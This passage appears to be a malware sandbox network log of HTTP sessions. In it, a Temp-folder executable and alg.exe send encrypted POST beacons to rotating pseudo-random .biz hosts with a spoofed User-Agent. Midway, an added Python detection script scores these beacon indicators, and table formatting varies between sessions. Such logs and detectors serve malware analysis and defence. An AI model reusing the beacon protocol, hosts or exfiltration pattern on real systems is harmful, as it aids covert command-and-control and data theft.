Data Ascii: CG0D>]:V,9h,!afs:id5<c{r'^U}CDxt!571m9e~k/4W %!e|Ni%PP2Q&:ogsv$BKR-|mC|{XVDMc~\QzUF7oL.fFVb@p
Oct 10, 2024 10:08:49.016828060 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:48 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5f6907179656c276da4ec26b4218349b|8.46.123.33|1728547728|1728547728|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
63 | 192.168.2.5 | 50044 | 47.129.31.212 | 80 | 7120 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:48.158731937 CEST | 356 | OUT | POST /vnjrxnyhwihcg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: oflybfv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:48.158773899 CEST | 778 | OUT | Data Raw: 8d 7b b3 33 aa 17 49 73 fe 02 00 00 44 11 8f 16 6c 95 66 0f c1 9b 8d 41 79 84 db 9b d2 84 f3 3f c3 04 db 5e b9 5b 69 3a 62 11 7a dc 42 06 c6 56 5d 7a 34 4b 18 99 c4 e7 86 4e b4 ed 14 53 97 cb e2 b4 0b ca 04 1b 7d de cf dc 76 26 40 95 79 cd a1 d2
Data Ascii: {3IsDlfAy?^[i:bzBV]z4KNS}v&@yeTg`ajVyP;'%.)ZQ|^'~cH{`qI0swzewXq3k>u\]ht:r$kZ^HE#+G!
Oct 10, 2024 10:08:49.497000933 CEST | 409 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=e1aa6bf59ce01b3f303f5f70498f418d|8.46.123.33|1728547729|1728547729|0|1|0; path=/; domain=.oflybfv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
64 | 192.168.2.5 | 50045 | 172.234.222.138 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:49.068244934 CEST | 344 | OUT | POST /xwv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:49.068264008 CEST | 828 | OUT | Data Raw: 86 38 2d a0 04 8a 15 92 30 03 00 00 50 b1 e2 ee 39 c7 b6 51 66 4f 81 62 07 ee c9 95 20 75 e8 aa c2 64 46 2c d3 54 cd 5e eb ae 44 44 0a db 1b 95 a6 04 b1 8b 12 77 bb 6b 2b 7e 2e 2c b3 e3 49 7c b9 2e 72 da 34 91 67 dc 28 b8 8f 36 c3 02 5f fc 9d 81
Data Ascii: 8-0P9QfOb udF,T^DDwk+~.,I|.r4g(6_MM&Mz\sLmC1unb\=}I)DC1k,LA#}aqXz8JR-C'1Z \iBmAi<d%d6r9yDS`IpL\/.0Y&lKpj8uERa/me


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID  Process
65          192.168.2.5  50046        172.234.222.138  80                576  C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:49.598443031 CEST  347                OUT        POST /dokmgu HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
66          192.168.2.5  50047        34.211.97.45    80                7120  C:\Windows\System32\alg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:49.696213007 CEST  349                OUT        POST /vqtoaeha HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: yhqqc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:50.428208113 CEST  407                IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=37cb42902b45fefcca431d19787d2f43|8.46.123.33|1728547730|1728547730|0|1|0; path=/; domain=.yhqqc.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
67          192.168.2.5  50048        34.246.200.160  80                576  C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:50.148199081 CEST  355                OUT        POST /lkirwmgfxelvg HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:50.941257954 CEST  408                IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:50 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=647c5d2e375941218a4944060a16d74e|8.46.123.33|1728547730|1728547730|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
68          192.168.2.5  50049        47.129.31.212   80                7120  C:\Windows\System32\alg.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:50.876770973 CEST  356                OUT        POST /hbnyekwgryhvrr HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: mnjmhp.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:52.256297112 CEST  408                IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=611cef6a3ac4246316bd93f589c7c9db|8.46.123.33|1728547731|1728547731|0|1|0; path=/; domain=.mnjmhp.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID  Process
69          192.168.2.5  50050        18.208.156.248  80                576  C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp                             Bytes transferred  Direction  Data
Oct 10, 2024 10:08:50.960459948 CEST  354                OUT        POST /kxstjshewunex HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:51.417134047 CEST  407                IN         HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:51 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=70660ba3dc01314950dcf87ed1e4fb1a|8.46.123.33|1728547731|1728547731|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID: 70 | Source: 192.168.2.5:50051 | Destination: 208.100.26.245:80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:51.458090067 CEST | 360 | OUT | POST /yowtqsuuesmahbsb HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:51.458108902 CEST | 828 | OUT | Data Raw: 90 ce a5 98 c5 e1 95 8c 30 03 00 00 2d 0f 3d e7 14 e9 ab 4c 2c d2 db 51 12 e7 a0 48 17 11 92 3f 57 b0 09 05 cb 2f de f4 ce 89 84 48 5d 34 56 b2 9f 73 8a 0d b1 85 9a 33 8a fa f6 e2 91 bc 07 fb bf 43 c2 b3 91 4e da 48 8a b7 8a 2c da 7f a7 8f ec a5
Data Ascii: 0-=L,QH?W/H]4Vs3CNH,rx2W\iqdf_b>2((`:bx#t$vPrjaR>\5tRz`w969%i[Wd~UUl}oE7U\R[[m'"]TN%,
Oct 10, 2024 10:08:51.947283983 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 08:08:51 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Oct 10, 2024 10:08:51.954931021 CEST | 354 | OUT | POST /vipiwgiihx HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:51.954965115 CEST | 828 | OUT | Data Raw: 19 62 9c d9 d3 86 77 b4 30 03 00 00 b7 df 9e 57 d4 c2 b2 02 d5 58 96 01 40 50 5b 8a ff d9 41 18 b5 ed 4f eb f1 49 88 84 1f 77 c3 e8 bb 5b 59 1b b2 d8 d1 d0 44 ee 83 5e 5d ad 34 fc 4f c0 d1 f2 7c 77 01 61 02 0f 5e c3 41 a5 a9 7b 97 4c fa f2 66 80
Data Ascii: bw0WX@P[AOIw[YD^]4O|wa^A{Lfv#~\N.G9NpuuQrx6nVj>,X-h&3Reu!pD[$HF0 v&+42Wgv|kkgFVVU'eA!0
Oct 10, 2024 10:08:52.071495056 CEST | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Thu, 10 Oct 2024 08:08:52 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID: 71 | Source: 192.168.2.5:50052 | Destination: 13.251.16.150:80 | PID: 576 | Process: C:\Users\user\AppData\Local\Temp\microsofts.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:52.091928005 CEST | 356 | OUT | POST /yclqyqmghucjea HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: qaynky.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 828
Oct 10, 2024 10:08:52.092071056 CEST | 828 | OUT | Data Raw: 2d 26 1d 86 96 f4 dd 06 30 03 00 00 3d f7 d4 bf 6a 44 18 0f 96 b6 ac 7d 1e c7 ac 3b 90 10 5b 47 c5 a5 16 1e 1e ec 52 b4 69 c0 3c 96 25 8b d0 89 8b 49 b7 5a d9 e5 25 0e e0 c0 ff 58 7a 15 46 31 7b c3 3d 01 79 53 0e 5f af 4e 3d 2b 49 ae d6 03 40 82
Data Ascii: -&0=jD};[GRi<%IZ%XzF1{=yS_N=+I@-O^EN\-f:kWiX^`@uH}e:.e/=E+o+I ]hnx0+)(,r>>@00
Oct 10, 2024 10:08:53.478326082 CEST | 408 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:53 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=9e38f2822531c1c6d8774f1605fa5463|8.46.123.33|1728547733|1728547733|0|1|0; path=/; domain=.qaynky.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0

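Every outbound POST in sessions 70 through 72 shares the same shape: a short pseudo-random path, a short pseudo-random .biz host, the same Chrome/39 + WeChat + QQBrowser User-Agent, the Cache-Control/Pragma no-cache pair, and a fixed-size encrypted body. The visible body bytes also expose a framing detail worth checking against: bytes 8 to 11 of each 828-byte body read 30 03 00 00 (816 little-endian, which is 828 - 12), and the 778-byte body from alg.exe carries fe 02 00 00 (766, which is 778 - 12). The script below is an added detection example, not part of the Joe Sandbox report or of the sample; it parses raw HTTP requests, scores those indicators, and validates the length framing. The request header block is copied from session 70, but the body is constructed to the same size because the report only shows the first bytes, and the benign control request is invented.

```python
import re
from dataclasses import dataclass

# Fixed User-Agent seen on every POST in the captures (Chrome/39 + WeChat + QQBrowser on Windows 7).
UA_MARKER = "MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat"
VOWELS = set("aeiou")


@dataclass
class HttpRequest:
    method: str
    path: str
    headers: dict
    body: bytes

    @property
    def host(self) -> str:
        return self.headers.get("host", "")


def parse_request(raw: bytes) -> HttpRequest:
    """Minimal HTTP/1.1 request parser: request line, lower-cased header names, raw body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("latin-1").split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return HttpRequest(method, path, headers, body)


def random_label(label: str) -> bool:
    """Heuristic for a pseudo-random lowercase label (y counts as a consonant):
    a run of 3+ consonants or almost no vowels. Matches gytujflc, qaynky, opowhhece; not 'login'."""
    if not re.fullmatch(r"[a-z]{5,16}", label):
        return False
    vowel_ratio = sum(c in VOWELS for c in label) / len(label)
    longest_run = max((len(m) for m in re.findall(r"[^aeiou]+", label)), default=0)
    return longest_run >= 3 or vowel_ratio <= 0.2


def body_framing_consistent(body: bytes) -> bool:
    """Bytes 8..11 hold little-endian (len(body) - 12), as seen in every captured body."""
    if len(body) < 12:
        return False
    return int.from_bytes(body[8:12], "little") == len(body) - 12


def c2_indicators(req: HttpRequest) -> list:
    """Return the list of beacon indicators this request matches."""
    reasons = []
    if UA_MARKER in req.headers.get("user-agent", ""):
        reasons.append("wechat-ua")
    if req.method == "POST" and re.fullmatch(r"/[a-z]{8,20}", req.path):
        reasons.append("random-path")
    if random_label(req.host.split(".")[0]):
        reasons.append("random-host")
    if req.headers.get("cache-control") == "no-cache" and req.headers.get("pragma") == "no-cache":
        reasons.append("no-cache-pair")
    if body_framing_consistent(req.body):
        reasons.append("len-framed-body")
    return reasons


def is_beacon(req: HttpRequest, threshold: int = 3) -> bool:
    return len(c2_indicators(req)) >= threshold


def build_body(prefix: bytes, payload: bytes) -> bytes:
    """Constructed body in the observed framing: 8-byte prefix + LE32 payload length + payload."""
    assert len(prefix) == 8
    return prefix + len(payload).to_bytes(4, "little") + payload


# Constructed sample: the 8-byte prefix is the one visible in session 70; the 816-byte payload is
# filler, since the report only shows the first bytes of the real body. Total size is 828 as captured.
SAMPLE_BODY = build_body(bytes.fromhex("90cea598c5e1958c"), bytes(range(256)) * 3 + bytes(48))

SAMPLE_REQUEST = (
    b"POST /yowtqsuuesmahbsb HTTP/1.1\r\n"
    b"Cache-Control: no-cache\r\n"
    b"Connection: Keep-Alive\r\n"
    b"Pragma: no-cache\r\n"
    b"Host: gytujflc.biz\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) "
    b"Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat "
    b"QBCore/3.43.884.400 QQBrowser/9.0.2524.400\r\n"
    b"Content-Length: 828\r\n"
    b"\r\n" + SAMPLE_BODY
)

# Constructed benign control: an ordinary browser GET with no body.
BENIGN_REQUEST = (
    b"GET /index.html HTTP/1.1\r\n"
    b"Host: www.example.com\r\n"
    b"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/129.0 Safari/537.36\r\n"
    b"\r\n"
)

if __name__ == "__main__":
    for raw in (SAMPLE_REQUEST, BENIGN_REQUEST):
        req = parse_request(raw)
        print(req.host, req.path, c2_indicators(req), is_beacon(req))
```

The threshold of three indicators keeps a single weak signal (an unusual User-Agent alone, or a no-cache pair alone) from firing on legitimate traffic; the length-framing check is the most specific of the five, because it is a property of the protocol rather than of any one domain or path, which the sample rotates per request.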

Session ID: 72 | Source: 192.168.2.5:50053 | Destination: 18.208.156.248:80 | PID: 7120 | Process: C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:52.483406067 CEST | 361 | OUT | POST /wcffwbepjknhrkkd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: opowhhece.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Oct 10, 2024 10:08:52.483406067 CEST | 778 | OUT | Data Raw: 70 29 6e 40 16 22 05 39 fe 02 00 00 75 dc 74 d7 65 28 71 15 e5 e8 0f 15 ad d6 4e 58 cd 7c 46 1b c3 2d 12 18 37 1f 44 08 80 a4 0c 12 d9 c0 fa 2b 96 da 8e 9a a8 07 ae 10 1d eb 5c 4d 40 af 3e e8 db 16 98 66 0c b5 5a 61 c4 85 1b 75 c5 31 ce 4d 0c ed
Data Ascii: p)n@"9ute(qNX|F-7D+\M@>fZau1MU.GcWo^#aY+mQoA}2#J`2$yybt3y1?k5<'W{[`Pev-uPLemaxM]mR`u.?-E
Oct 10, 2024 10:08:52.946887970 CEST | 411 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 10 Oct 2024 08:08:52 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5782b28a3f5999d9b4caabad7985d9ab|8.46.123.33|1728547732|1728547732|0|1|0; path=/; domain=.opowhhece.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                          Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                          Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
73 | 192.168.2.5 | 50054 | 44.221.84.105 | 80 | 576 | C:\Users\user\AppData\Local\Temp\microsofts.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:53.607645988 CEST | 361 | OUT | POST /fsupyedkjsaginlp HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: bumxkqgxu.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 828
Oct 10, 2024 10:08:53.607661009 CEST | 828 | OUT | Data Raw: 3f 61 6a b3 9e bb 3b e2 30 03 00 00 89 1b 59 f7 79 74 41 b1 01 14 44 51 b3 95 a0 54 93 0f 8b 18 03 75 ee a9 47 21 a5 15 a3 5f 54 f7 b0 5b e6 55 c6 49 11 f0 21 15 71 4c 1b f3 54 7f 64 55 f7 31 ce ed 11 a3 c3 cb de 36 af be 01 f5 ca 8c f4 31 85 33
    Data Ascii: ?aj;0YytADQTuG!_T[UI!qLTdU1613'o)C#SSnJ@l%4(AIw/Wghrc\sSX92S]H,!nac2&~PXVTExS-
Oct 10, 2024 10:08:54.091234922 CEST | 411 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:54 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=773a7962f685a2ab2f299f059615f9d3|8.46.123.33|1728547734|1728547734|0|1|0; path=/; domain=.bumxkqgxu.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
74 | 192.168.2.5 | 50055 | 13.251.16.150 | 80 | 7120 | C:\Windows\System32\alg.exe

Timestamp | Bytes transferred | Direction | Data
Oct 10, 2024 10:08:53.622752905 CEST | 357 | OUT | POST /oknxycjjxcvmcyg HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Host: jdhhbs.biz
    User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
    Content-Length: 778
Oct 10, 2024 10:08:53.622766018 CEST | 778 | OUT | Data Raw: 46 90 2f 11 9d 15 48 0e fe 02 00 00 7a 7e 9a b8 fb 2e 51 70 44 3b 79 c2 e1 eb 36 29 d5 8c 52 ad 68 6c 8f 84 ce e6 5d 76 44 b8 69 7a 9b f9 a9 e9 3e aa c2 8a 82 09 58 67 40 63 f7 78 21 e6 8b 4a 6d ff 52 cd f8 c8 8b 4d 68 bf 90 79 bc f5 4a a7 cf ce
    Data Ascii: F/Hz~.QpD;y6)Rhl]vDiz>Xg@cx!JmRMhyJ:s.LK{P~kEO:Vf9:3E799h#`Z.2wjjsPP A(j.2t|N"78yi7p(W5kt7>CrL1-
Oct 10, 2024 10:08:54.983011961 CEST | 408 | IN | HTTP/1.1 200 OK
    Server: nginx
    Date: Thu, 10 Oct 2024 08:08:54 GMT
    Content-Type: text/html
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: btst=596c369c5720579ffb2ac5a3893fc733|8.46.123.33|1728547734|1728547734|0|1|0; path=/; domain=.jdhhbs.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
    Set-Cookie: snkz=8.46.123.33; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
    Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


